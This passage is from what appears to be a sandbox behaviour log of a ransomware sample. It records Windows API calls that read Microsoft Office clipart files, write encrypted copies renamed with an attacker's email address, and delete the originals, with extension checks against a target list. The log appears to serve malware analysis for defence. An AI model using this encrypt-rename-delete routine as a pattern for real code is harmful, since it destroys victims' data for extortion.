Office\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.884] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.884] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.885] GetLastError () returned 0x0 [0273.885] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x227a, lpOverlapped=0x0) returned 1 [0273.886] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x2280, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x2280, lpOverlapped=0x0) returned 1 [0273.887] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.887] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.887] SetEndOfFile (hFile=0x2ac) returned 1 [0273.887] CloseHandle (hObject=0x2ac) returned 1 [0273.887] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.887] SetEndOfFile (hFile=0x37c) returned 1 [0273.889] CloseHandle (hObject=0x37c) returned 1 [0273.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.889] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg")) returned 1 [0273.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63 [0273.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63 [0273.891] lstrlenW (lpString=".doc") returned 4 [0273.891] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0273.891] lstrlenW (lpString=".docx") returned 5 [0273.891] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0273.891] lstrlenW (lpString=".pdf") returned 4 [0273.892] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0273.892] lstrlenW (lpString=".xls") returned 4 [0273.892] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0273.892] lstrlenW (lpString=".xlsx") returned 5 [0273.892] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0273.892] lstrlenW (lpString=".ppt") returned 4 [0273.892] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0273.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63 [0273.892] lstrlenW (lpString=".zip") returned 4 [0273.892] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0273.892] lstrlenW (lpString=".rar") returned 4 [0273.892] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0273.892] lstrlenW (lpString=".bz2") returned 4 [0273.892] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0273.892] lstrlenW (lpString=".7z") returned 3 [0273.892] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0273.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63 [0273.892] lstrlenW (lpString=".dbf") returned 4 [0273.892] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0273.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63 [0273.892] lstrlenW (lpString=".1cd") returned 4 [0273.892] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0273.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63 [0273.892] lstrlenW (lpString=".jpg") returned 4 [0273.892] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0273.893] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=13954) returned 1 [0273.893] CloseHandle (hObject=0x37c) returned 1 [0273.893] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg")) returned 0x20 [0273.893] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.893] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.893] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.893] GetLastError () returned 0x0 [0273.893] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x3682, lpOverlapped=0x0) returned 1 [0273.895] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x3690, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x3690, lpOverlapped=0x0) returned 1 [0273.896] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.896] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.896] SetEndOfFile (hFile=0x2ac) returned 1 [0273.896] CloseHandle (hObject=0x2ac) returned 1 [0273.896] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.896] SetEndOfFile (hFile=0x37c) returned 1 [0273.898] CloseHandle (hObject=0x37c) returned 1 [0273.898] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.898] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg")) returned 1 [0273.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63 [0273.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63 [0273.898] lstrlenW (lpString=".doc") returned 4 [0273.898] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0273.898] lstrlenW (lpString=".docx") returned 5 [0273.899] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1 [0273.899] lstrlenW (lpString=".pdf") returned 4 [0273.899] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0273.899] lstrlenW (lpString=".xls") returned 4 [0273.899] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0273.899] lstrlenW (lpString=".xlsx") returned 5 [0273.899] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1 [0273.899] lstrlenW (lpString=".ppt") returned 4 [0273.899] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0273.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63 [0273.899] lstrlenW (lpString=".zip") returned 4 [0273.899] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0273.899] lstrlenW (lpString=".rar") returned 4 [0273.899] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0273.899] lstrlenW (lpString=".bz2") returned 4 [0273.899] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0273.899] lstrlenW (lpString=".7z") returned 3 [0273.899] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0273.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63 [0273.899] lstrlenW (lpString=".dbf") returned 4 [0273.899] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0273.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63 [0273.899] lstrlenW (lpString=".1cd") returned 4 [0273.899] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0273.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63 [0273.900] lstrlenW (lpString=".jpg") returned 4 [0273.900] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0273.900] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=9671) returned 1 [0273.900] CloseHandle (hObject=0x37c) returned 1 [0273.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg")) returned 0x20 [0273.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.900] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.900] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.901] GetLastError () returned 0x0 [0273.901] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x25c7, lpOverlapped=0x0) returned 1 [0273.902] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x25d0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x25d0, lpOverlapped=0x0) returned 1 [0273.903] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.903] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.903] SetEndOfFile (hFile=0x2ac) returned 1 [0273.903] CloseHandle (hObject=0x2ac) returned 1 [0273.903] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.903] SetEndOfFile (hFile=0x37c) returned 1 [0273.905] CloseHandle (hObject=0x37c) returned 1 [0273.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.905] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg")) returned 1 [0273.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63 [0273.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63 [0273.906] lstrlenW (lpString=".doc") returned 4 [0273.906] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0273.906] lstrlenW (lpString=".docx") returned 5 [0273.906] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0273.906] lstrlenW (lpString=".pdf") returned 4 [0273.906] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0273.906] lstrlenW (lpString=".xls") returned 4 [0273.906] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0273.906] lstrlenW (lpString=".xlsx") returned 5 [0273.906] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0273.906] lstrlenW (lpString=".ppt") returned 4 [0273.906] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0273.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63 [0273.906] lstrlenW (lpString=".zip") returned 4 [0273.906] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0273.906] lstrlenW (lpString=".rar") returned 4 [0273.906] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0273.906] lstrlenW (lpString=".bz2") returned 4 [0273.906] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0273.906] lstrlenW (lpString=".7z") returned 3 [0273.906] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0273.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63 [0273.906] lstrlenW (lpString=".dbf") returned 4 [0273.906] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0273.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63 [0273.906] lstrlenW (lpString=".1cd") returned 4 [0273.907] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0273.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63 [0273.907] lstrlenW (lpString=".jpg") returned 4 [0273.907] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0273.907] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=26160) returned 1 [0273.907] CloseHandle (hObject=0x37c) returned 1 [0273.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf")) returned 0x20 [0273.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.907] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.907] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.908] GetLastError () returned 0x0 [0273.908] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x6630, lpOverlapped=0x0) returned 1 [0273.910] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x6640, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x6640, lpOverlapped=0x0) returned 1 [0273.911] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.911] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.911] SetEndOfFile (hFile=0x2ac) returned 1 [0273.911] CloseHandle (hObject=0x2ac) returned 1 [0273.911] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.911] SetEndOfFile (hFile=0x37c) returned 1 [0273.913] CloseHandle (hObject=0x37c) returned 1 [0273.913] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.913] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf")) returned 1 [0273.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63 [0273.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63 [0273.913] lstrlenW (lpString=".doc") returned 4 [0273.913] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.913] lstrlenW (lpString=".docx") returned 5 [0273.913] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0273.913] lstrlenW (lpString=".pdf") returned 4 [0273.914] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.914] lstrlenW (lpString=".xls") returned 4 [0273.914] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.914] lstrlenW (lpString=".xlsx") returned 5 [0273.914] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0273.914] lstrlenW (lpString=".ppt") returned 4 [0273.914] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63 [0273.914] lstrlenW (lpString=".zip") returned 4 [0273.914] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.914] lstrlenW (lpString=".rar") returned 4 [0273.914] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.914] lstrlenW (lpString=".bz2") returned 4 [0273.914] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.914] lstrlenW (lpString=".7z") returned 3 [0273.914] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63 [0273.914] lstrlenW (lpString=".dbf") returned 4 [0273.914] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63 [0273.914] lstrlenW (lpString=".1cd") returned 4 [0273.914] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 63 [0273.914] lstrlenW (lpString=".jpg") returned 4 [0273.914] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.915] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=27546) returned 1 [0273.915] CloseHandle (hObject=0x37c) returned 1 [0273.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf")) returned 0x20 [0273.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.915] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.915] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.915] GetLastError () returned 0x0 [0273.916] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x6b9a, lpOverlapped=0x0) returned 1 [0273.917] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x6ba0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x6ba0, lpOverlapped=0x0) returned 1 [0273.918] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.918] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.918] SetEndOfFile (hFile=0x2ac) returned 1 [0273.918] CloseHandle (hObject=0x2ac) returned 1 [0273.918] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.918] SetEndOfFile (hFile=0x37c) returned 1 [0273.920] CloseHandle (hObject=0x37c) returned 1 [0273.921] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.921] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf")) returned 1 